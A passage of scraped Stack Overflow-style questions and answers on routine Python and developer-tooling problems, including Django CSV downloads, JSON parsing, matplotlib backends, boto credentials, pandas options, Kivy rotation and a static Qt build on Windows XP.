            writer.writerow([v.idfa.idfa, v.name, v.duration, v.firstSeen, v.lastSeen, v.identifier, v.closestProximity])
        f.seek(0)
        response = HttpResponse(f, content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv'
        return response

For some reason, when opening the file in Excel, the file will only output the last item in the list, see ![here](http://i.stack.imgur.com/CRNYz.png) This leads me to believe that each row is overriding the first row, although this shouldn't be the case. Look at these tests I have performed in the terminal.

    >>> f.getvalue()
    'FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,PPTest1,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR\r\nFFAC6F6C-1B2E-47C2-8110-5E619B239FB1,moo2,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR\r\n'

This returns more than one value, with `\r\n` between the values. Also, I tried

    >>> print response
    Content-Type: text/csv
    Content-Disposition: attachment; filename=boo.csv

    FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,PPTest1,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR
    FFAC6F6C-1B2E-47C2-8110-5E619B239FB1,moo2,00:00:24,2014-11-11 23:20:24.730000,2014-11-11 23:20:48.750000,nkfe-cnb7s,NEAR

And that also showed more than one value. I recently saw a SO thread that discusses appending to a file: [How do you append to file in python?](http://stackoverflow.com/questions/4706499/how-do-you-append-to-file-in-python) But since I am creating this item in memory only (using StringIO), how can I get the same effect? Thanks!

**EDIT For extra information:** The `visit_list` is comprised of Visit models:

    class Visit(models.Model):
        idfa = models.ForeignKey(Report)
        name = models.CharField(max_length=255)
        lastSeen = models.CharField(max_length=255)
        duration = models.CharField(max_length=255)
        firstSeen = models.CharField(max_length=255)
        identifier = models.CharField(max_length=255)
        closestProximity = models.CharField(max_length=255)

        def __unicode__(self):
            return self.name

        class Meta:
            verbose_name = "Visit"
            verbose_name_plural = "Visits"

In this particular case, visit_list returns:

    >>> visit_list
    [<Visit: PPTest1>, <Visit: moo2>]

Answer: **Bottom Line**: I suspect you need to pass `f.getvalue()` to `HttpResponse` rather than `f`.

**The Explanation**: [`HttpResponse` prefers strings](https://docs.djangoproject.com/en/1.6/ref/request-response/#usage), although it can also be treated like a file object or accept iterators. Nevertheless, `f` is a `StringIO.StringIO` instance and not a string per se.
Consider the following setup:

    import StringIO
    import csv

    >>> f = StringIO.StringIO()
    >>> writer = csv.writer(f, dialect='excel')
    >>> row = range(4)  # first row is [0, 1, 2, 3]
    >>> for i in range(5):
            writer.writerow([row])       # write more rows
            row = [x + 1 for x in row]
    >>> f.seek(0)

Now compare `f` with the result of `f.getvalue()`:

    # an instance
    >>> f
    <StringIO.StringIO instance at 0x03656990>

    # a string
    >>> f.getvalue()
    '"[0, 1, 2, 3]"\r\n"[1, 2, 3, 4]"\r\n"[2, 3, 4, 5]"\r\n"[3, 4, 5, 6]"\r\n"[4, 5, 6, 7]"\r\n'

Now note the difference in your `response` object when you pass the instance versus the string to `HttpResponse`:

    # The instance
    >>> response = HttpResponse(f, content_type='text/csv')              # f is an instance
    >>> response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv'
    >>> response._container
    ['']

    # The string
    >>> response = HttpResponse(f.getvalue(), content_type='text/csv')   # f.getvalue() returns a string
    >>> response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv'
    >>> response._container
    ['"[0, 1, 2, 3]"\r\n"[1, 2, 3, 4]"\r\n"[2, 3, 4, 5]"\r\n"[3, 4, 5, 6]"\r\n"[4, 5, 6, 7]"\r\n']

Note that the response's `_container` attribute is empty when you pass the instance to `HttpResponse` but **not** empty when you pass the `f.getvalue()` string to `HttpResponse`. I would try this instead, then:

    >>> response = HttpResponse(f.getvalue(), content_type='text/csv')
    >>> # etc.
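A related option, not from the original answer: since Django's `HttpResponse` is itself a file-like object (it has a `write()` method), `csv.writer` can write straight into the response and the `StringIO` buffer can be dropped entirely. A sketch, assuming the same `visit_list` as in the question:

    import csv
    from django.http import HttpResponse

    def csv_download(request):
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename=AdvertiserData.csv'
        writer = csv.writer(response, dialect='excel')
        for v in visit_list:  # assumed to be fetched the same way as in the question
            writer.writerow([v.idfa.idfa, v.name, v.duration, v.firstSeen,
                             v.lastSeen, v.identifier, v.closestProximity])
        return response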
How can JSON data with null value be converted to a dictionary Question:

    {
        "abc": null,
        "def": 9
    }

I have JSON data which looks like this. If not for null (without quotes as a string), I could have used `ast` module's `literal_eval` to convert the above to a dictionary. A dictionary in Python cannot have `null` as value but can have `"null"` as a value. How do I convert the above to a dictionary that Python recognizes?

Answer: You should use the built-in [`json` module](https://docs.python.org/3/library/json.html), which was designed explicitly for this task:

    >>> import json
    >>> data = '''
    ... {
    ...     "abc": null,
    ...     "def": 9
    ... }
    ... '''
    >>> json.loads(data)
    {'def': 9, 'abc': None}
    >>> type(json.loads(data))
    <class 'dict'>
    >>>

By the way, you should use this method even if your JSON data contains no `null` values. While it may work (sometimes), `ast.literal_eval` was designed to evaluate _Python_ code that is represented as a string. It is simply the wrong tool to work with JSON data.
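For completeness, the mapping works in the other direction too; a small sketch (not part of the original answer) showing that `json.dumps` turns `None` back into `null`:

    import json

    d = {'abc': None, 'def': 9}
    print(json.dumps(d))  # e.g. {"abc": null, "def": 9}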
Run python script from enthought canopy with an absolute path as an argument Question: I would like to run a python script from enthought canopy v1.5.0.2717, either on mac or windows, and provide an absolute file path as an argument using the run configuration dialog. In the run configuration I put an argument (for example):

    '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml'

My script contains the following code:

    import sys
    print sys.argv[1]

I then click "run" and the printed string is:

    '/Users/dir/Data/University'

Another example is using the path:

    'C:\User\Program files\test.txt'

and it prints

    'C:UserProgram'

It looks like it splits the path at the spaces, and deletes the "\". Running the script from the command line like:

    $python myScript.py '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml'

results in the correct printed string:

    '/Users/dir/Data/University stuff/CQT/Data/ScriptRunFolder/testingPythonRfRamp.xml'

How can I achieve the same result using Canopy?

Answer: The shell will group everything within double quotes into a single parameter, not single quotes.

    >type showme.py
    import sys
    print(sys.argv[1:])

    >python showme.py 'i am sad'
    ["'i", 'am', "sad'"]

    >python showme.py "i am happy"
    ['i am happy']
Compiling Qt statically on Windows XP and MinGW fail. Is it possible to achieve? Question: I need to compile Qt statically. I have to do it on a virtual machine running Windows XP. Because of this requirement, I can't use the PowerShell 3.0 script suggested in the wiki page [How to build a static Qt for Windows/MinGW](http://qt-project.org/wiki/How-to-build-a-static-Qt-for-Windows-MinGW) (PowerShell 3.0 can't be installed on WinXP). I tried to read the script and do its work step by step manually. I added to the end of `C:\Qt\5.3\Src\qtbase\mkspecs\win32-g++\qmake.conf` file:

    # [QT-STATIC-PATCH]
    QMAKE_LFLAGS += -static -static-libgcc
    QMAKE_CFLAGS_RELEASE -= -O2
    QMAKE_CFLAGS_RELEASE += -Os -momit-leaf-frame-pointer
    DEFINES += QT_STATIC_BUILD

I ran the configuration:

    mkdir C:\Qt\5.3\Static-build
    cd C:\Qt\5.3\Static-build
    ..\Src\configure.bat -static -debug-and-release -platform win32-g++ \
        -prefix C:\Qt\5.3\Static -qt-zlib -qt-pcre -qt-libpng -qt-libjpeg \
        -qt-freetype -opengl desktop -qt-sql-sqlite -no-openssl -opensource \
        -confirm-license -make libs -nomake tools -nomake examples -nomake tests

and that seems OK:

    This is the Qt for Windows Open Source Edition.
    You have already accepted the terms of the license.
    Creating qmake...
    mingw32-make: Nothing to be done for 'first'.
    Running configuration tests...
    Environment:
        INCLUDE=
            Unset
        LIB=
            Unset
        PATH=
            C:\Qt\5.3\mingw482_32\bin
            C:\Qt\Tools\mingw482_32\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\Program Files\Git\git-cheetah\..\bin
            C:\WINDOWS\system32
            C:\WINDOWS
            C:\WINDOWS\System32\Wbem
            C:\Program Files\Git\cmd
            C:\Program Files\TortoiseGit\bin
            C:\Program Files\CMake\bin
            C:\Python27
            C:\StrawberryPerl\perl\bin
            C:\StrawberryPerl\win32
            C:\WINDOWS\system32\WindowsPowerShell\v1.0
    Configuration:
        pcre debug compile_examples
    Qt Configuration:
        minimal-config small-config medium-config large-config full-config
        debug_and_release build_all release debug c++11 static zlib gif jpeg
        png freetype build_all accessibility opengl audio-backend
        native-gestures qpa iconv concurrent
    QMAKESPEC...................win32-g++ (commandline)
    Architecture................i386, features:
    Host Architecture...........i386, features:
    Maketool....................mingw32-make
    Debug build.................yes (combined)
    Default build...............debug
    Force debug info............no
    C++11 support...............yes
    Link Time Code Generation...no
    Accessibility support.......yes
    RTTI support................yes
    SSE2 support................yes
    SSE3 support................yes
    SSSE3 support...............yes
    SSE4.1 support..............yes
    SSE4.2 support..............yes
    AVX support.................yes
    AVX2 support................yes
    NEON support................no
    IWMMXT support..............no
    OpenGL support..............yes
    Large File support..........yes
    NIS support.................no
    Iconv support...............yes
    Evdev support...............no
    Mtdev support...............no
    Inotify support.............no
    eventfd(7) support..........no
    Glib support................no
    CUPS support................no
    OpenVG support..............no
    OpenSSL support.............no
    Qt D-Bus support............no
    Qt Widgets module support...yes
    Qt GUI module support.......yes
    QML debugging...............yes
    DirectWrite support.........no
    Use system proxies..........no
    QPA Backends:
        GDI.....................yes
        Direct2D................no
    Third Party Libraries:
        ZLIB support............qt
        GIF support.............yes
        JPEG support............yes
        PNG support.............yes
        FreeType support........yes
        Fontconfig support......no
        HarfBuzz-NG support.....no
        PCRE support............qt
        ICU support.............no
        ANGLE...................no
        Dynamic OpenGL..........no
    Styles:
        Windows.................yes
        Windows XP..............yes
        Windows Vista...........yes
        Fusion..................yes
        Windows CE..............no
        Windows Mobile..........no
    Sql Drivers:
        ODBC....................no
        MySQL...................no
        OCI.....................no
        PostgreSQL..............no
        TDS.....................no
        DB2.....................no
        SQLite..................yes (qt)
        SQLite2.................no
        InterBase...............no
    Sources are in..............C:\Qt\5.3\Src\qtbase
    Build is done in............C:\Qt\5.3\Static-build\qtbase
    Install prefix..............C:\Qt\5.3\Static
    Headers installed to........C:\Qt\5.3\Static\include
    Libraries installed to......C:\Qt\5.3\Static\lib
    Arch-dep. data to...........C:\Qt\5.3\Static
    Plugins installed to........C:\Qt\5.3\Static\plugins
    Library execs installed to..C:\Qt\5.3\Static\bin
    QML1 imports installed to...C:\Qt\5.3\Static\imports
    QML2 imports installed to...C:\Qt\5.3\Static\qml
    Binaries installed to.......C:\Qt\5.3\Static\bin
    Arch-indep. data to.........C:\Qt\5.3\Static
    Docs installed to...........C:\Qt\5.3\Static\doc
    Translations installed to...C:\Qt\5.3\Static\translations
    Examples installed to.......C:\Qt\5.3\Static\examples
    Tests installed to..........C:\Qt\5.3\Static\tests
    WARNING: Using static linking will disable the use of plugins. Make sure you compile ALL needed modules into the library.
    Generating Makefiles...
    Qt is now configured for building. Just run mingw32-make.
    To reconfigure, run mingw32-make confclean and configure.

But the compilation with mingw32-make failed at some point:

    cd qml/ && ( test -e Makefile || c:/Qt/5.3/Static-build/qtbase/bin/qmake.exe C:/Qt/5.3/Src/qtdeclarative/tools/qml/qml.pro -o Makefile ) && c:/Qt/Tools/mingw482_32/bin/mingw32-make -f Makefile
    'QT_PLUGIN_PATH' n'est pas reconnu en tant que commande interne ou externe, un programme exécutable ou un fichier de commandes.
    Project ERROR: Failed to parse qmlimportscanner output.
    Makefile:94: recipe for target 'sub-qml-make_first' failed
    mingw32-make[2]: *** [sub-qml-make_first] Error 3
    mingw32-make[2]: Leaving directory 'c:/Qt/5.3/Static-build/qtdeclarative/tools'
    Makefile:66: recipe for target 'sub-tools-make_first' failed
    mingw32-make[1]: *** [sub-tools-make_first] Error 2
    mingw32-make[1]: Leaving directory 'c:/Qt/5.3/Static-build/qtdeclarative'
    Makefile:101: recipe for target 'module-qtdeclarative-make_first' failed
    mingw32-make: *** [module-qtdeclarative-make_first] Error 2

Sorry for the French wording. The interesting point is:

> 'QT_PLUGIN_PATH' is not recognized as internal or external command, an executable program or a command file

I found other people having the same issue ([here](http://qt-project.org/forums/viewthread/38552)) and tried the solution they suggested (from [here](https://github.com/Alexpux/MINGW-packages/blob/master/mingw-w64-qt5/qt-5.3.0-static-qmake-conf.patch)): I added

    QMAKE_LFLAGS_STATIC_LIB += -static

to qtbase/mkspecs/win32-g++/qmake.conf and added

    static:win32: QMAKE_LFLAGS += $$QMAKE_LFLAGS_STATIC_LIB

to qtbase/mkspecs/features/default_post.prf. I still have the error. So I have 2 questions:

 1. **Do you know if it is possible to compile Qt 5.3 on Windows XP with MinGW?**
 2. **Does someone know how to fix the error `'QT_PLUGIN_PATH' is not recognized [...]`?**

Answer: OK, for a weird reason, after closing my console, re-opening it and re-trying, it worked :/ I leave this question open in case someone has a better explanation for the "'QT_PLUGIN_PATH' is not recognized [...]" error. Apparently I was not the first to get stuck on this error.
How to clean images in Python / Django? Question: I'm asking this question because I can't solve one problem in `Python/Django` (in pure Python it's actually ok) which leads to `RuntimeError: tcl_asyncdelete async handler deleted by the wrong thread`. This is somehow related to the way I render `matplotlib` plots in Django. The way I do it is:

    ...
    import matplotlib.pyplot as plt
    ...
    fig = plt.figure()
    ...
    plt.close()

I have minimized my code as much as possible. But the catch is - even if I have just one line of code:

    fig = plt.figure()

I see this RuntimeError happening. I hope I could solve the problem if I knew the correct way of closing/cleaning/destroying plots in Python/Django.

Answer: By default matplotlib uses the Tk GUI toolkit. When you're rendering an image without using the toolkit (i.e. into a file or a string), matplotlib still instantiates a window that doesn't get displayed, causing all kinds of problems. In order to avoid that, you should use the Agg backend. It can be activated like so --

    import matplotlib
    matplotlib.use('Agg')
    from matplotlib import pyplot

For more information please refer to the matplotlib documentation -- <http://matplotlib.org/faq/howto_faq.html#matplotlib-in-a-web-application-server>
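To make this concrete, here is a minimal sketch (not from the original answer) of a Django view that renders a plot with the Agg backend and closes the figure afterwards; the view name and the plotted data are placeholders:

    import matplotlib
    matplotlib.use('Agg')               # must run before pyplot is imported
    import matplotlib.pyplot as plt

    import io
    from django.http import HttpResponse

    def plot_png(request):
        fig = plt.figure()
        plt.plot([1, 2, 3], [4, 2, 5])  # placeholder data
        buf = io.BytesIO()
        fig.savefig(buf, format='png')  # rendered by Agg, no Tk window involved
        plt.close(fig)                  # free the figure so memory doesn't grow
        return HttpResponse(buf.getvalue(), content_type='image/png')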
why boto not find config the file (Credentials) Question: I created a new config file:

    $ sudo vi ~/.boto

There I pasted my credentials (as written in the readthedocs for boto):

    [Credentials]
    aws_access_key_id = YOURACCESSKEY
    aws_secret_access_key = YOURSECRETKEY

I'm trying to check the connection:

    import boto
    boto.set_stream_logger('boto')
    s3 = boto.connect_s3("us-east-1")

and this is the output:

    2014-11-26 14:05:49,532 boto [DEBUG]:Using access key provided by client.
    2014-11-26 14:05:49,532 boto [DEBUG]:Retrieving credentials from metadata server.
    2014-11-26 14:05:50,539 boto [ERROR]:Caught exception reading instance data
    Traceback (most recent call last):
      File "/Library/Python/2.7/site-packages/boto/utils.py", line 210, in retry_url
        r = opener.open(req, timeout=timeout)
      File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 404, in open
        response = self._open(req, data)
      File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 422, in _open
        '_open', req)
      File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 382, in _call_chain
        result = func(*args)
      File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1214, in http_open
        return self.do_open(httplib.HTTPConnection, req)
      File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1184, in do_open
        raise URLError(err)
    URLError: <urlopen error timed out>
    2014-11-26 14:05:50,540 boto [ERROR]:Unable to read instance data, giving up
    Traceback (most recent call last):
      File "/Users/user/PycharmProjects/project/untitled.py", line 8, in <module>
        s3 = boto.connect_s3("us-east-1")
      File "/Library/Python/2.7/site-packages/boto/__init__.py", line 141, in connect_s3
        return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
      File "/Library/Python/2.7/site-packages/boto/s3/connection.py", line 190, in __init__
        validate_certs=validate_certs, profile_name=profile_name)
      File "/Library/Python/2.7/site-packages/boto/connection.py", line 569, in __init__
        host, config, self.provider, self._required_auth_capability())
      File "/Library/Python/2.7/site-packages/boto/auth.py", line 975, in get_auth_handler
        'Check your credentials' % (len(names), str(names)))
    boto.exception.NoAuthHandlerFound: No handler was ready to authenticate. 1 handlers were checked. ['HmacAuthV1Handler'] Check your credentials

Why doesn't it find the credentials? Is there something I did wrong?

Answer: It is saying: **Check your credentials** You specified incorrect credentials; there is nothing wrong with your config file syntax. I have no issues when I specify the correct credentials in the config file.

    >>> import boto
    >>> s3 = boto.connect_s3("us-west-1")
    >>> s3
    S3Connection:s3.amazonaws.com
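One more thing worth checking, not part of the original answer: the traceback shows `return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)`, i.e. the first positional argument of `boto.connect_s3` is the access key, so `boto.connect_s3("us-east-1")` passes the region name as an access key (which matches the "Using access key provided by client" log line) and the `~/.boto` file is then ignored. If the goal is to pick a region, a sketch along these lines may be closer to the intent:

    import boto
    import boto.s3

    # Let boto pick up the credentials from ~/.boto
    s3 = boto.connect_s3()

    # Or, to target a specific region explicitly:
    s3_region = boto.s3.connect_to_region('us-east-1')
    print(s3_region)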
Parse XML in Python with lxml.etree Question: How can I parse this site (<http://www.tvspielfilm.de/tv-programm/rss/heute2015.xml>) with python to get, for example, the TV program for today on SAT at 20:15? I've tried the Python library lxml.etree, but I failed:

    #!/usr/bin/python
    import lxml.etree as ET
    import urllib2

    response = urllib2.urlopen('http://www.tvspielfilm.de/tv-programm/rss/heute2015.xml')
    xml = response.read()
    root = ET.fromstring(xml)

    for item in root.findall('SAT'):
        title = item.find('title').text
        print title

Answer: The method `Element.findall` takes an XPath expression as an argument. `'SAT'` finds only direct children of the root node that are named SAT, and the root node here is `'rss'`. If you need to find a tag anywhere in the document, use `'.//SAT'`. The expression `'.//item'` is what you are looking for:

    #!/usr/bin/python
    import lxml.etree as ET
    import urllib2

    response = urllib2.urlopen('some/url/to.xml')
    xml = response.read()
    root = ET.fromstring(xml)

    for item in root.findall('.//item'):
        title = item.find('title').text
        print title
How can i move files from one directory to another? Question: I am a beginner in Python. I want to move some files from one directory to another. I just know I have to use some modules like os and shutil. I wrote this code but it returns an error:

    import shutil
    import os

    source = os.listdir("/tmp/")
    destination = "/tmp/newfolder/"

    for files in source:
        if files.endswith(".txt"):
            shutil.move(files,destination)

please help me

Answer: This is kind of a wild guess, but I'm pretty sure that this is your problem, so I'll give it a try. Note that `os.listdir` returns a list of filenames only; it does not include the directory that was the parameter to `os.listdir`. I.e., you have to tell `shutil.move` where to find those files! Also, you might have to create the destination directory, if it does not yet exist. Try this:

    import shutil, os

    source = "/tmp/"
    destination = "/tmp/newfolder/"

    if not os.path.exists(destination):
        os.makedirs(destination)  # only if it does not yet exist

    for f in os.listdir(source):
        if f.endswith(".txt"):
            shutil.move(source + f, destination)  # add source dir to filename
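A slightly more robust variant (my own addition, not from the original answer) uses `glob` and `os.path.join`, so the code does not depend on `source` ending with a slash:

    import glob
    import os
    import shutil

    source = "/tmp"
    destination = "/tmp/newfolder"

    if not os.path.exists(destination):
        os.makedirs(destination)

    # glob returns full paths, so no manual string concatenation is needed
    for path in glob.glob(os.path.join(source, "*.txt")):
        shutil.move(path, destination)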
Regex not matching \t\n\r\f\v in Python Question: I have a list of strings:

    content = ['***************************************\n\t', 'ADVENTURE', '*', 'Solving', 'it', 'in', 'easy', 'steps', '*\n\t', '*\t\t\t\t', '*\n\t', '*\t\t\t\t', '*\n\t', '***************************************\n\t\t', 'FROM:', 'THE', 'ROM', 'DR.', 'CALL', 'HER']

from which I'm trying to remove anything that ends with a non-alphanumeric character like \t, \n, \v and so on. I have the following code:

    import re

    for each in content:
        m = re.match('.*[\t\n\r\f\v]+', each)
        if m:
            content.remove(each)

But the output is still giving me strings with \n or \t. Any ideas?

Answer: You don't need a regex here; you can use `str.strip()` and `set` (**note that `set` removes duplicates, so use this only if your list has no duplicate elements, or if you don't want duplicates**). First strip every element of the `content` list (removing whitespace at the leading and trailing ends of each string), then take the intersection (`&`) of the new stripped list and the original list to keep the elements that appear in both, i.e. the elements that `strip()` did not change:

    >>> new = [i.strip() for i in content]
    >>> set(content) & set(new)
    set(['*', 'in', 'ROM', 'HER', 'Solving', 'it', 'CALL', 'ADVENTURE', 'easy', 'DR.', 'steps', 'THE', 'FROM:'])
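If order and duplicates matter, a regex-based filter also works; this is not from the original answer. The main problem with the original loop is that it removes items from `content` while iterating over it, which makes Python skip elements. Building a new list avoids that:

    import re

    content = ['***************************************\n\t', 'ADVENTURE', '*',
               'Solving', 'it', 'in', 'easy', 'steps', '*\n\t']

    # Keep only the strings that contain none of the listed whitespace characters.
    cleaned = [s for s in content if not re.search(r'[\t\n\r\f\v]', s)]
    print cleaned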
Behaviour of rotating image between kivy and python Question: I'm having a problem understanding what kivy is doing behind the scenes when using the kivy language when rotating images and moving them. Below is code that is supposed to draw two images at a 45 degree angle on the screen and then, for every mouse click, rotate them further and move them to the right on the screen. The first image is drawn using the rotate defined in the kivy language, while for the second I try to redo it in Python only (to understand better what kivy is actually doing), but I'm failing, since the Python version firstly does not move the image to the right when I increase x, but looks like the whole coordinate system has been rotated for that image since it moves at a 45 degree angle up the screen, and secondly it does not rotate that image when I click. Can anybody tell me what I am missing, and what would be needed in Python (without using the kivy language) to acquire the same behaviour as the first image? Thanks in advance! Dan

    from kivy.app import App
    from kivy.lang import Builder
    from kivy.uix.image import Image
    from kivy.graphics import Rotate
    from kivy.uix.widget import Widget
    from kivy.properties import NumericProperty
    from kivy.graphics.context_instructions import PopMatrix, PushMatrix

    Builder.load_string('''
    <TestKV>:
        canvas.before:
            PushMatrix
            Rotate:
                angle: self.angle
                axis: (0, 0, 1)
                origin: self.center
        canvas.after:
            PopMatrix
    ''')

    class TestKV(Image):
        angle = NumericProperty(0)

        def __init__(self, x, **kwargs):
            super(TestKV, self).__init__(**kwargs)
            self.x = x
            self.angle = 45

        def on_touch_down(self, touch):
            self.angle += 20
            self.x += 10

    class TestPY(Image):
        angle = NumericProperty(0)

        def __init__(self, x, **kwargs):
            super(TestPY, self).__init__(**kwargs)
            self.x = x
            with self.canvas.before:
                PushMatrix()
                rot = Rotate()
                rot.angle = 45
                rot.origin = self.center
                rot.axis = (0, 0, 1)
            with self.canvas.after:
                PopMatrix()

        def on_touch_down(self, touch):
            self.angle += 20
            self.x += 10

    class MainWidget(Widget):
        #this is the main widget that contains the game.
        def __init__(self, **kwargs):
            super(MainWidget, self).__init__(**kwargs)
            self.all_sprites = []
            self.k = TestKV(source="myTestImage.bmp", x=10)
            self.add_widget(self.k)
            self.p = TestPY(source="myTestImage.bmp", x=200)
            self.add_widget(self.p)

    class TheApp(App):
        def build(self):
            parent = Widget()
            app = MainWidget()
            parent.add_widget(app)
            return parent

    if __name__ == '__main__':
        TheApp().run()

Answer: You never change the angle of the `Rotate` instruction. You have an `angle` property on your widget, but that isn't linked to anything. Try updating the `Rotate` instruction instead:

    class TestPY(Image):
        def __init__(self, **kwargs):
            super(TestPY, self).__init__(**kwargs)
            # self.x = x -- not necessary, x is a property and will be handled by super()
            with self.canvas.before:
                PushMatrix()
                self.rot = Rotate()
                self.rot.angle = 45
                self.rot.origin = self.center
                self.rot.axis = (0, 0, 1)
            with self.canvas.after:
                PopMatrix()

        def on_touch_down(self, touch):
            self.x += 10
            self.rot.origin = self.center  # center has changed; update here or bind instead
            self.rot.angle += 20
create android project and android-support-v7-appcompat is not included in lib(eclipse) Question: I fixed the problem. I used the workspace which was given by a python professor. I guess some settings did not match. After changing the workspace, it works. Thanks to all you guys for your answers. When I create a new Android project, I ask Eclipse to create the activity for me. The generated code needs to import v7, but there is no v7 in the lib. The error message shows up and stops the creation process. Does anyone know how to fix it? (And I want to fix it once and for all; I don't want it to show up every time I create a new project.) (Also, if I can't fix it, Eclipse cannot finish the creation process, which means some files have not been created before the error. This is the biggest problem.)

    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'.
    [2014-11-26 23:39:54 - s]
    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v11\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'.
    [2014-11-26 23:39:54 - s]
    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v14\styles.xml:8: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light.DarkActionBar'.
    [2014-11-26 23:39:54 - s]
    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'.
    [2014-11-26 23:39:54 - s]
    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v11\styles.xml:7: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light'.
    [2014-11-26 23:39:54 - s]
    [2014-11-26 23:39:54 - s] C:\EclipseWorkspaces\personal\s\res\values-v14\styles.xml:8: error: Error retrieving parent for item: No resource found that matches the given name 'Theme.AppCompat.Light.DarkActionBar'.
    [2014-11-26 23:39:54 - s]

Answer: This is because you need to reference the support v7 appcompat library in your project; it is missing. You can solve this problem with the following steps:

 1. File -> Import (android-sdk\extras\android\support\v7). Choose "appcompat"
 2. Project -> Properties -> Android. In the "Library" section, "Add" and choose "appCompat"

That's it. I hope this answer is helpful to you, friend :)
ipython notebook pandas max allowable columns Question: I have a simple csv file with ten columns! When I set the following option in the notebook and print my csv file (which is in a pandas dataframe) it doesn't print all the columns from left to right; it prints the first two, the next two underneath, and so on. I used this option, why isn't it working?

    pd.option_context("display.max_rows", 1, "display.max_columns", 100)

Even this doesn't seem to work:

    pandas.set_option('display.max_columns', None)

Answer: I assume you want to display your data in the notebook; then the following options work fine for me (IPython 2.3):

    import pandas as pd
    from IPython.display import display

    data = pd.read_csv('yourdata.txt')

Either directly set the option

    pd.options.display.max_columns = None
    display(data)

Or, use the set_option method you showed, which actually works fine as well

    pd.set_option('display.max_columns', None)
    display(data)

If you don't want to set this option for the whole script, use the context manager

    with pd.option_context('display.max_columns', None):
        display(data)

Note that `pd.option_context` only takes effect inside a `with` block, which is probably why your first attempt appeared to do nothing. If this doesn't help, you might give a minimal example to reproduce your issue.
Merging Pandas DataFrames on categorical series Question: I'm trying to understand if pandas supports merging DataFrames on columns of categorical data (i.e. dtype="category"). I do most of my data work in R, but am trying to do more work in Python/pandas. In R, merging on factors (analogous to the categorical dtype) induces type coercion, typically to character. This allows one data frame to have a by-variable (join column) specified as a factor (categorical) and the other to have its by-variable be a string. Does pandas perform similar coercion of categorical data to string prior to merging/joining? Should I expect merging on categoricals to be robust? Where can I find documentation on (automatic) type coercion in pandas? Simple example:

+++ It is an error to test a categorical vector for equality against a non-categorical/non-scalar vector:

    In [52]: import pandas as pd
             a = pd.Series(['a','b','c'],dtype="category")
             b = pd.Series(['a','b','c'],dtype="object")
             c = pd.Series(['a','b','cc'],dtype="object")

    In [54]: a==b
    ---------------------------------------------------------------------------
    TypeError                                 Traceback (most recent call last)
    ...
    TypeError: Cannot compare a Categorical for op <built-in function eq> with type <class 'numpy.ndarray'>. If you want to compare values, use 'series <op> np.asarray(cat)'.

+++ But merging a DataFrame on columns of different type--one categorical, one string--does not throw an error (at least in this simple case). Some type of coercion must occur:

    In [59]: A = pd.DataFrame({'A':a,'B':[1,2,3]})
             B = pd.DataFrame({'A':b,'C':[4,5,6]})
             print(A.merge(B,on='A'))

       A  B  C
    0  a  1  4
    1  b  2  5
    2  c  3  6

Answer: So in short, in 0.15.1 the merging behavior was changed (fixed really) to allow merging of Categoricals that have exactly the same categories. Further, merging in an object array is allowed, but the resulting dtype of the merged column would then be object (IIRC). I don't recall whether we try to infer it back to a Categorical or not. I created an issue [here](https://github.com/pydata/pandas/issues/8938) for discussion on this. The equality shown above, e.g. not allowing comparisons of Categoricals vs object dtypes, was done first, while the merging behavior was recently expanded to allow the merging of like-Categoricals and object dtypes (assuming all merged Categoricals share the same categories). So I think allowing the equality to work is just the API not catching up. We will address this in 0.16.0, but pls provide comments on the issue. PR for this is [here](https://github.com/pydata/pandas/pull/8946) This will be in the upcoming 0.15.2 release (slated for week of December 7, 2014)
issues with python xml parsing Question: I'm new to xml and REST but have some basic knowledge with python. I'm facing some issues while trying to parse the attached xml file. I use the BeautifulSoup library to parse the file and, for an unknown reason, I can access different fields of entries 2 and 3 but not entry 1, while they are all formatted the same way. Can someone tell me what I'm doing wrong with my (attached) code and output please?

    <?xml version='1.0' encoding='UTF-8'?>
    <feed xmlns="http://www.w3.org/2005/Atom">
        <title type="text">News</title>
        <id>1</id>
        <link href="" />
        <link href="http://192.168.1.12:8083/myWebApp/rest/listOfEntries/1/entries" rel="self" />
        <updated>2014-11-26T10:41:12.424Z</updated>
        <author />
        <entry xmlns:georss="http://www.georss.org/georss">
            <title type="html">TEST REST</title>
            <content type="html">1</content>
            <author>
                <name>User213</name>
            </author>
